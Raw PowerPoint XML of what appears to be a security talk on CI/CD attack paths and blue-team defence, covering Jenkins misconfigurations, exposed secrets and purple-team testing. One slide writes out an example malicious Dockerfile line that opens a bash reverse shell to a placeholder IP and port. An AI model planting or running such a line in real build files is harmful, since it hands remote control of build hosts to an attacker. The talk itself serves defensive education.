            <a:ext cx="1688616" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Push docker image</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="29" name="Straight Arrow Connector 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0BB1C0C-F17D-DE41-A07E-DB411D468E9F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10452521" y="3776161"/>
            <a:ext cx="0" cy="1272917"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="53975">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F8464EC-C368-6044-B967-1AADEF65F675}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8768434" y="4155834"/>
            <a:ext cx="1688616" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Polls registry</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Rectangle 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CAD98181-31BC-0040-9BAB-5D7B188733A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="220021" y="2442227"/>
            <a:ext cx="1524000" cy="821529"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1"/>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apezoid 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CA9E000-B4C1-E146-AA68-A5E3653AD716}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114003" y="3263756"/>
            <a:ext cx="1749286" cy="357807"/>
          </a:xfrm>
          <a:prstGeom prst="trapezoid">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picture containing object, light, lamp&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E82A895-4538-3C45-8D4F-E4424EF0A14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0721" y="2611691"/>
            <a:ext cx="482600" cy="482600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1433225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F5C5-E6B6-CE42-B23B-4C583363B1A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="6000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4EEBFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CI/CD Hosts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A41050A6-CF93-734A-B8EC-C1AF3E022E28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1690688"/>
            <a:ext cx="6798276" cy="4871737"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Potential path to production</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Misconfigurations (ex: Jenkins)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Checking for exposed secrets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Internal git</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>On compromised workstations/servers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Chat (ex: Slack)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attempts to deploy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>malcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> from the internal git repo:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ex </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dockerfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4EEBFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CMD (/bin/bash –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="4EEBFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4EEBFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> &gt;&amp; /dev/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="4EEBFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4EEBFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/&lt;IP&gt;/&lt;port&gt; 0&gt;&amp;1)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="4400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF8EE3DA-3676-E245-A2A8-42B61302ED2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36475" y="2396379"/>
            <a:ext cx="4209535" cy="2217801"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Cyber Security Training | SANS Courses, Certifications &amp; Research">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A30CA58-D9F2-214B-8004-306F95DF288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427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F5C5-E6B6-CE42-B23B-4C583363B1A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="6000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Blue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4EEBFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Team Considerations</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A41050A6-CF93-734A-B8EC-C1AF3E022E28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838201" y="1825625"/>
            <a:ext cx="7354329" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Proactively check each of your build and deploy hosts (Jenkins, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CircleCI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, etc.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Jenkins </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>unauth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> script console</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Unauth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ability to execute jobs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Older versions vulnerable to RCE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Collab with product security to build processes/runbooks for CI/CD compromise</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1247AA18-7146-AC43-B987-BC7A4710E6BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8495441" y="2551840"/>
            <a:ext cx="3489244" cy="2613283"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Cyber Security Training | SANS Courses, Certifications &amp; Research">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E441888D-9351-974C-8ED2-72D5703A16A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313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3159-544C-3D48-8911-04589ED6F750}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1462217" y="2073833"/>
            <a:ext cx="9144000" cy="2387600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Summary</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 4" descr="Cyber Security Training | SANS Courses, Certifications &amp; Research">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3615D8F-66A5-A140-B20C-B1BBEEAEC99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473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DD8B-B9D0-F64C-A266-FD538C4944A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1028700" y="218140"/>
            <a:ext cx="10415587" cy="1049235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="6000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4EEBFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>In A Nutshell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8793116A-4B13-F648-A13D-1BA7EA50F68D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-142585" y="1267375"/>
            <a:ext cx="7696682" cy="5281706"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:schemeClr val="accent6">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Difficult to defend what is not known or understood</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:schemeClr val="accent6">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Helpful for defenders to probe the network and environment to see what attack points are present</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:schemeClr val="accent6">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A lot of the scenarios discussed make for great purple team scenarios</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:schemeClr val="accent6">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Can proactively identify shore up areas of deficiency </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:schemeClr val="accent6">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:schemeClr val="accent6">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buClr>
                <a:schemeClr val="accent6">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:buClr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:schemeClr val="accent6">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F4C1F8B-809D-9A43-AE5B-FD89249521A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7554097" y="2601097"/>
            <a:ext cx="4253813" cy="2835875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Cyber Security Training | SANS Courses, Certifications &amp; Research">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{423EE9DC-B0DE-5747-AAA4-A9576CE35B2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518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DD8B-B9D0-F64C-A266-FD538C4944A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1028700" y="218140"/>
            <a:ext cx="10415587" cy="1049235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="6000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4EEBFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>In A Nutshell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8793116A-4B13-F648-A13D-1BA7EA50F68D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-142585" y="1106737"/>
            <a:ext cx="7696682" cy="5281706"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:schemeClr val="accent6">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Start with Unit Testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buClr>
                <a:schemeClr val="accent6">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MITRE ATT&amp;CK framework</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buClr>
                <a:schemeClr val="accent6">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Automated tools (Caldera, Red Canary, etc.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:schemeClr val="accent6">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Progress to Scenario-Based Testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buClr>
                <a:schemeClr val="accent6">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Break attacks chains into chunks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buClr>
                <a:schemeClr val="accent6">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Run in controlled environment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:schemeClr val="accent6">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:buClr>
